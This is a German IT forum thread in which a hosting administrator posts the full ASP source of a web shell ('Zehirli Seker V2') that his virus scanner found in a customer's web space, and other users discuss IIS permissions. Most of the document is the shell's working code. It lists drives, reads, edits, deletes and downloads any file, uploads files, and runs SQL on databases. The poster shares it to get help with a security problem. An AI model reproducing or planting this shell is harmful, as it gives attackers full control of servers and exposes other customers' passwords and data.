Dieser Beitrag ist schon älter. Bitte vergewissern Sie sich, dass die Rahmenbedingungen oder der enthaltene Lösungsvorschlag noch dem aktuellen Stand der Technik entspricht.

IIS6 Sicherheitsproblem

Mitglied: maddin70
mein server-virenscanner hat in einem meiner kundenwebs ein asp-script entdeckt, mit dem man via web auf alle verzeichnisse und
dateien des servers zugreifen kann.
hab ich hier irgendwo was falsch eingestellt oder ist das noch ein
sicherheitsproblem des IIS?
berechtigt für den webordner und die datei sind das IUSR_serverxxx konto und trotzdem
komme ich auf alle laufwerke des rechners, kann sogar asp-code anderer kundenwebs meines server ansehen und sogar die original asp-datei runterladen (somit auch passwörter von eventuellen mysql-cannects).....

server ist win2003/sp1 alle sicherheitsupdates sind installiert.

hier dir code (dateiname zehir2.asp)

<%
on error resume next
Dim objFSO
Set objFSO = CreateObject ("Scripting.FileSystemObject")
dosyaPath = "Zehir2.asp"
status = Request("status")
path = Request("path")
dPath = Request("dPath")
arama = Request("txArama")
dkayit = Request("dkayit")
table = Request("table")
del = Request("del")
strSQL = Request("strSQL")
pathfile = request("pathfile")
' ;////////////////////////////
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
Response.Buffer=True
Set Fil = objFSO.GetFile(pathfile)

Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Fil.name

Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.End()
end if
' ;////////////////////////////
Class FileUploader
Public Files
Private mcolFormElem

Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub

Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub

Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form =
mcolFormElem.Item(LCase(sIndex))
End Property

Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound

biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))

If (nPosEnd-nPosBegin) <= 0 Then Exit Sub

vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)

Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))

nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)

If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile

nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName,
Len(sFileName)-InStrRev(sFileName, "\"))

nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))

oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin,
nPosEnd-nPosBegin))

nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)

If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName),
oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add
LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If

nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData,
vDataBounds)
Loop
End Sub

'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function

'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class

Function BinaryToString(Binary)
dim cl1, cl2, cl3, pl1, pl2, pl3
Dim L
cl1 = 1
cl2 = 1
cl3 = 1
L = LenB(Binary)
Do While cl1<=L
pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
cl1 = cl1 + 1
cl3 = cl3 + 1
if cl3>300 then
pl2 = pl2 & pl3
pl3 = ""
cl3 = 1
cl2 = cl2 + 1
if cl2>200 then
pl1 = pl1 & pl2
pl2 = ""
cl2 = 1
End If
End If
Loop
BinaryToString = pl1 & pl2 & pl3
End Function

Class UploadedFile
Public ContentType
Public FileName
Public FileData

Public Property Get FileSize()
FileSize = LenB(FileData)
End Property

Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex

If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"

Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub

Set oFile = oFS.CreateTextFile(sPath & FileName, True)

For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next

oFile.Close
End Sub

Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub

If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub

End Class

if status="-4" then
Dim Uploader, File
Set Uploader = New FileUploader
Uploader.Upload()
Response.Write "Dosya gönderilmiþtir" & Uploader.Form("fullname") &
"

"
If Uploader.Files.Count = 0 Then
Response.Write "Hiç Dosya Upload Edilemedi."
Else
For Each File In Uploader.Files.Items
File.FileName = request.Form("FNAME")
If Uploader.Form("saveto") = "disk" Then
File.SaveToDisk path
End If
Response.Write "Dosya Adý : " & File.FileName & "
"
Response.Write "Dosya Boyutu : " & File.FileSize & " bytes

"
Next
End If
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
end if
' ;////////////////////////////
sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
Else
cur = ""
End If

Set f = objFSO.GetFolder(cur)

Set fc = f.Files
For Each f1 In fc
if lcase(Right(f1.name,len(ara_)))=lcase(ara_) then
downStr = "<font face=webdings size=5><a
href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
if lcase(ara_)="mdb" then
Response.Write downStr&"<font face=wingdings size=5><a
href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font>
  • <a
href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&"
["&f1.size&"]"&"</a></b>
"
else
Response.Write downStr&"<font face=wingdings size=5><a
href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a
href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font>
- <a
href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&"
["&f1.size&"]"&"</a></b>
"
end if
end if
Next

Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Next
Set f = Nothing
Set fc = Nothing
Set fs = Nothing
end sub
%>
<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse
vlink=Chartreuse>
<pre><center><p><font face="Times New Roman, Times, serif"
size="3">Zehirli Þeker V2</font>


POWERED BY ZEHIR HACKER
IP/Cyber-WARRiOR Team</p><p><font face="Times New Roman, Times,
serif" size="3">Akýncýlar Grubu</font>

<a href="http://www.Cyber-Warrior.Org;>illegalPort.com</a>" / <a
href="http://www.Cyber-Warrior.Org;>Cyber-WARRiOR.Org</a></p ..."
<script language=javascript>
var dosyaPath = "<%=dosyaPath%>"
DRIVE ISLEMLERI
function driveGo(drive_){
location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date()
}
</script>
<%
Response.Write "<table border=1 width=85% cellpadding=0 cellspacing=0><tr
bgcolor=gray><td colspan=2 align=center><font color=white>Sistem
Bilgileri</td></tr>"
Response.Write "<tr><td>Local Adres</td><td> " &
request.servervariables("REMOTE_ADDR") & "</td></tr>"
Response.Write "<tr><td>User Agent</td><td> " &
request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
Response.Write "<tr><td>Server</td><td> " &
request.servervariables("SERVER_NAME") & "</td></tr>"
Response.Write "<tr><td>IP</td><td> " &
request.servervariables("LOCAL_ADDR") & "</td></tr>"
Response.Write "<tr><td>HTTPD</td><td> " &
request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
Response.Write "<tr><td>Port</td><td> " &
request.servervariables("SERVER_PORT") & "</td></tr>"
Response.Write "<tr><td>Yol</td><td> " &
request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
Response.Write "<tr><td>Log Root</td><td> " &
request.servervariables("APPL_MD_PATH") & "</td></tr>"
Response.Write "<tr><td>HTTPS</td><td> " & request.servervariables("HTTPS")
& "</td></tr>"
Response.Write "</table>
"

Response.Write "<table align=center border=1 width=150 cellpadding=0
cellspacing=0><tr bgcolor=gray><td align=center><b><font
color=white>Tipi</td><td align=center><b><font color=white>Sürücü</td></tr>"
for each drive_ in objFSO.Drives
Response.Write "<tr><td>"
if drive_.Drivetype=1 then Response.write "Floppy"
if drive_.Drivetype=2 then Response.write "HardDisk"
if drive_.Drivetype=3 then Response.write "Remote HDD"
if drive_.Drivetype=4 then Response.write "CD-Rom"
Response.Write "</td><td align=center>"
Response.write "<input style='width:50%'
onClick=""driveGo('"&drive_.DriveLetter&"');"" type=button
value='"&drive_.DriveLetter&"'>"
Response.Write "</td></tr>"
next
Response.Write "</table>
"

Response.Write "<form method=get action='"&DosyPath&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>Hýzlý
Eriþim</td></tr><tr><td>"
Response.Write "<input type=hidden value='2' name=status><input type=hidden
value='"&time&"' name=Time>"
Response.Write "<input style='width:350' value='"&Path&"' name=Path><input
type=submit value='Git' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>
"

sub aramaUpload
Response.Write "<form method=get action='"&DosyPath&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>Arama</td></tr><tr><td>"
Response.Write "<input type=hidden value='12' name=status><input type=hidden
value='"&time&"' name=Time>"
Response.Write "<input type=hidden value='"&Path&"' name=Path><input
style='width:350' value='mdb' name=txArama><input type=submit value='Git'>"
Response.Write "</td></tr></table></form>
"

Response.Write "<FORM METHOD='POST' ENCTYPE='multipart/form-data'
ACTION='"&DosyaPath&"?status=-4&Time="&time&"&Path="&path&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>Dosya Upload</td></tr><tr><td
align=center>"
Response.Write "<INPUT TYPE=HIDDEN NAME='FULLNAME' VALUE='ZEHIR'>"
Response.Write "<INPUT TYPE=HIDDEN NAME='saveto' VALUE='disk'>"
Response.Write "<input style='width:350' type=File name=FILE1>"
Response.Write "
<INPUT TYPE=TEXT style='width:285' NAME='FNAME'
VALUE='ZEHIR.TXT'>"
response.Write "<input type=submit value='Upload'>"
Response.Write "</td></tr></table></form>
"
Response.Write "</center>"
end sub

SELECT CASE status
CASE 1 'Driver Open
aramaUpload
Response.Write "<table width=100% ><tr>"
Path = Path & ":/"
Response.Write "<td valign=top>"
KlasorOku
Response.Write "</td><td valign=top align=right>"
DosyaOku
Response.Write "</td>"
CASE 2 'Normal listeleme
aramaUpload
Response.Write "<table width=100% ><tr>"
Response.Write "<td valign=top>"
KlasorOku
Response.Write "</td><td valign=top align=right>"
DosyaOku
Response.Write "</td>"
CASE 3 'File Delete
objFSO.DeleteFile del
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
CASE 4 'Folder Delete
objFSO.DeleteFolder del
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
CASE 5 'Dosya içeriðini görüntüle
Response.Write "<table width=100% ><tr>"
set f = objFSO.OpenTextFile(path,1)
Response.Write "<pre>"&f.readAll&"</pre>"
if err.number=62 then Response.Write "<script language=javascript>alert('Bu
Dosya Okunamýyor\nSistem dosyasý olabilir')</script>":Response.End
CASE 6 'Resim aç
Response.Write "<center><img ALT='IP HACK TEAM'
src='"&resimYol(path)&"'></center>"
CASE 7 'database tablo listele
Response.Write "<form method=get action='"&DosyPath&"' id=form1
name=form1>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>SQL
Çalýþtýr</td></tr><tr><td>"
Response.Write "<input type=hidden value='9' name=status><input type=hidden
value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:350' value='' name=strSQL><input
type=submit value='Çalýþtýr' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>
"

Response.Write "<b><font size=3>Tablolar</font></br>
"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objADOX.ActiveConnection = objConn

For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<font face=wingdings size=5>4</font> <a
href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a>
"
End If
Next
CASE 8 'database kayýt listele
Response.Write "<form method=get action='"&DosyPath&"' id=form1
name=form1>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>SQL
Çalýþtýr</td></tr><tr><td>"
Response.Write "<input type=hidden value='9' name=status><input type=hidden
value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:350' value='' name=strSQL><input
type=submit value='Çalýþtýr' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>
"

Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText

Response.Write "<table border=1 cellpadding=2 cellspacing=0
bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font
color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td>"&objRcs.Fields(i).Value&"</td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table>"
CASE 9 'SQL Execute
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objConn.Execute strSQL
Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
CASE 10 'Dosya Editleme
set f = objFSO.OpenTextFile(dPath,1)
Response.Write "<center><form action='"&DosyPath&"?Time="&time&"'
method=post>"
Response.Write "<input type=hidden name=status value='11'>"
Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
Response.Write "<input type=hidden name=Path value='"&Path &"'>"
Response.Write "<input type=submit value=Kaydet>
"
Response.Write "<textarea name=dkayit style='width:90%;height:350'>"
Response.Write server.HTMLEncode(f.readAll)
Response.Write "</textarea></form></center>"
CASE 11 'Dosya Kayýt
set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
saveTextFile.Write(dkayit)
saveTextFile.close
Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time
CASE 12 'Dosya Arama
aramaUpload
araBul path,arama
END SELECT
Response.Write "</tr></table>"

sub DosyaOku
Set f = objFSO.GetFolder(Path)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<font face=webdings><a
href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
select case uzanti
case "mdb"
Response.Write "<a
href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a>

<font face=wingdings size=5>M <a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
case "asp"
Response.Write "<a
href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>
<font face=wingdings size=5>± <a
href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a><a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
case "jpg","gif"
Response.Write "<a
href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>
<font face=webdings size=5>¢</font><font face=wingdings size=5> <a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
case else
Response.Write "<a
href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>
<font face=wingdings size=5>2 <a
href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a><a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
end select
Next
end sub

sub KlasorOku
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 In fc
Response.Write "<font face=wingdings size=5><a
href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>
1</font> <a
href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a>

"
Next
end sub

function resimYol(path_)
anayol = request.servervariables("APPL_PHYSICAL_PATH")
num = InStrRev(anayol,"\")
dim i,k,yollar,geriyol,girdimi
i=0
k=0
girdimi=false
while num>0
anayol = left(anayol,num-1)
geriyol = geriyol & "../"
num = InStrRev(anayol,"\")
girdimi=true
wend
'if girdimi=true then geriyol = left(geriyol,len(geriyol)-3)

path_ = Replace(path_,"\","/")
path_ = Replace(path_,"
","/")
path_ = Replace(path_," ;","/")
path_ = Replace(path_,"
","/")
path_ = Replace(path_," ;","/")

num = InStr(1,path_,"/")
while num>0
folder = left(path_,num-1)
path_ = Right(path_,len(path_)-num)
if k<>0 then
yollar = yollar & "/" & folder
end if
num = InStr(1,path_,"/")
k = k + 1
wend

resimYol = Replace(geriyol & yollar & "/" & path_,"
","/")
end function
Set fc = Nothing
Set objFSO = Nothing
Response.End
%>

Content-Key: 35878

Url: https://administrator.de/contentid/35878

Ausgedruckt am: 03.08.2021 um 07:08 Uhr

Mitglied: Raphael
Raphael 12.07.2006 um 14:44:16 Uhr
Goto Top
wie hast du getestet obs "funktioniert"?
Falls du das Script nicht in ein öffentliches Verzeichnis sondern in ein "geschützes" verzeichnis kopiert hast zum testen, dann hast du nicht die Rechte des öffentlichen Users sondern die Rechte des Users mit dem du dich eingelogt hast.
könnte an dem liegen.

kind regards
Mitglied: maddin70
maddin70 12.07.2006 um 14:52:01 Uhr
Goto Top
ich hab das file in ein öffentliches webverzeichnis gelegt, also mit www.xxx.xx/xxx.asp zum aufrufen. die öffentlichen ordner haben bei mir aber nur die IUSR_server- rechte. das ist ja der witz. brauchst nur mal das script in deinem space ablegen und testen.....
Mitglied: Raphael
Raphael 12.07.2006 um 20:08:49 Uhr
Goto Top
es gibt ja 2 Accounts für den IIS .. eines unter dem der IIS selber läuft und ein "anonymes" für den Besucher quasi ...
Evtl. hat der IIS-Account zuviele Rechte ...
oder hast du irgend ein Laufwerk für "everbody", bzw. "jeder" (bei deutschem Windows) freigegeben?

ansonsten kann ich's mir grad nicht erklären wie's gehen soll. Ich mag das Script bei mir nicht ausprobieren ;) (wirst du hoffentlich verstehen)
Heiß diskutierte Beiträge
question
Hyper-V - verwaiste Snapshots löschen gelöst basdschoVor 1 TagFrageHyper-V28 Kommentare

Hallo, mein Veeam machte bei einer installation Probleme und konnte plötzlich die Snapshots nicht mehr löschen. Kein Problem, Disks konsolidiert, alte Snapshot Dateien gelöscht. Nun ...

question
USB 3 beißt sich mit 2,4Ghz Funkperipherie gelöst O-Two06Vor 1 TagFragePeripheriegeräte3 Kommentare

Hiho, ich habe nun schon einige Artikel über das leidige Thema gelesen, komme aber zu keiner Lösung. Ich habe Mini-PCs, bei denen nun leider mal ...

question
Fritzbox 7590 ersetzten gegen Modem + Router oder Router mit Modemindignus-estVor 1 TagFrageNetzwerke11 Kommentare

Hallo zusammen, nach langer Krankheit und Genesungszeit fasse ich jetzt mal wieder den Mut eine frage zustellen die mir schon seit längeren im Kopf herum ...

question
Ipv6 RouterliodiceVor 1 TagFrageDSL, VDSL10 Kommentare

Hallo zusammen, ich hoffe ihr könnt mir weiterhelfen, ich benötigen einen ADSL Router (Kabelgebundenen) der IPv4 und IPv6 kann, also Dual Stack (DHCP Extern und ...

question
Günstiges Open-Source NAS für HeimgebrauchpanguuVor 18 StundenFrageSAN, NAS, DAS9 Kommentare

Hallo, mit NAS-Systemen hatte ich bisher gearbeitet: Synology, QNAP, Buffalo, etc. Dabei kommen proprietäre Betriebssysteme zum Einsatz, die sich natürlich von Hersteller zu Hersteller unterscheiden ...

question
SSH Login nur möglich bei eingelogtem USERhell.wienVor 1 TagFrageLinux Netzwerk18 Kommentare

habe einen Server (Debian) mit SSH (nur mit Public Key und auf einem Custom Port) und ufw aktiv. Ich kann mich nicht einlogen. Wenn ich ...

question
ProLiant DL380p G8 findet HP SAS-Festplatten MB3000FBUCN nicht ?IT-DAUVor 1 TagFrageServer-Hardware5 Kommentare

Hallo liebe Community! Kurz vorweg: ich bin Quereinsteiger in der IT-Branche und möchte nun als Vorbereitung zu meinem Ausbildungskurs bzw. für zu Hause ein bisschen ...

question
Backup-Konzept für HeimgebrauchmossoxVor 13 StundenFrageBackup7 Kommentare

Guten Tag zusammen, ich bin mir nicht sicher, ob ich das richtige Unterforum gewählt habe, denn meine Frage berührt auch den Bereich Hardware und Netzwerke. ...